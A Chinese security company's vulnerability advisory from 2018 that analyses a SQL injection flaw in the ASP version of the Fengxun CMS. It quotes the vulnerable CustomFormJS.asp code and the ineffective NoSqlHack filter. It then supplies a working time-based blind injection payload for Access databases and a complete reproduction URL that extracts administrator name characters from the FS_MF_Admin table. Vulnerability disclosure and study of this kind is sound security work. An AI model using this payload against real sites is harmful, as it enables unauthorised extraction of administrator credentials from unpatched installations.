首页 > 漏洞预警和分析 > 风讯asp版本sql注入

风讯asp版本sql注入

[2018.01.15]

挖了.net版没有道理不挖asp的版本,毕竟asp版本的风讯更为久远。

 

漏洞文件:

CustomFormID = NoSqlHack(request.QueryString("CustomFormID"))

FormStyleID = NoSqlHack(request.QueryString("FormStyleID"))

DataStyleID = NoSqlHack(request.QueryString("DataStyleID"))

TextCSS = NoSqlHack(request.QueryString("TextCSS"))

if TextCSS <> "" then TextCSS = " Class=""" & TextCSS & """"

SelectCSS = NoSqlHack(request.QueryString("SelectCSS"))

if SelectCSS <> "" then SelectCSS = " Class=""" & SelectCSS & """"

OtherCSS = NoSqlHack(request.QueryString("OtherCSS"))

if OtherCSS <> "" then OtherCSS = " Class=""" & OtherCSS & """"

if CustomFormID = "" then

         Response.Write("document.write('调用表单参数传递错误');" & vbcrlf)

         Response.End

end if

form_sql="select id,formName,tableName,VerifyLogin,StartTime,EndTime,Validate,TimeLimited from FS_MF_CustomForm where state=0 and id=" & CustomFormID

set obj_form_rs=conn.execute(form_sql)

 

 

首先看见一个form_sql后面CustomFormID没有单引号保护所有一般情况下是有注入的但我们可以看见这里存在一个nosqlhack

 

Function NoSqlHack(FS_inputStr)

         FS_inputStr = Trim(FS_inputStr)

         If FS_inputStr = "" Or Isnull(FS_inputStr) Then

             FS_inputStr = ""

         End if

         FS_inputStr = Replace(FS_inputStr,Chr(39),"'")                         '单引号

    'FS_inputStr = Replace(FS_inputStr,";","")

    'FS_inputStr = Replace(FS_inputStr," ","")

    'FS_inputStr = Replace(FS_inputStr,"%","")

    'FS_inputStr = Replace(FS_inputStr," ","")

         NoSqlHack = FS_inputStr

End Function

 

就对单引号和分号这些进行了替换对我们的注入没有丝毫的影响,如果数据表内有内容是可以通过回显注入的但是此表默认是没有内容的就会很尴尬只有进行延时注入

 

(select iif(mid(name,1,1)="a",(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)<>0,3) from FS_MF_Admin where ID =4)

 

 

 

 

本地复现:

 

 

http://localhost:8001/CustomForm/CustomFormJS.asp?CustomFormID=1 union select 1,(select iif(asc(mid(admin_name,2,1))=100,(SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10)<>0,3) from FS_MF_Admin where ID =4),3,4,5,6,7,8 from FS_MF_Admin&TextCSS=1&SelectCSS=1&OtherCSS=1

 

 

 

成功时间暂停

 



 

业务咨询联系方式:
网络信息安全服务:13581958748 汪经理     软件信息系统评测:13811226090 彭经理     移动终端设备检测:18611706493 张经理     网络系统设备检测:13522983759 路经理     传输配套设备检测:13466736366 白经理     
友情链接
北京通和实益电信科学技术研究所有限公司 版权所有 京ICP备15030238号-1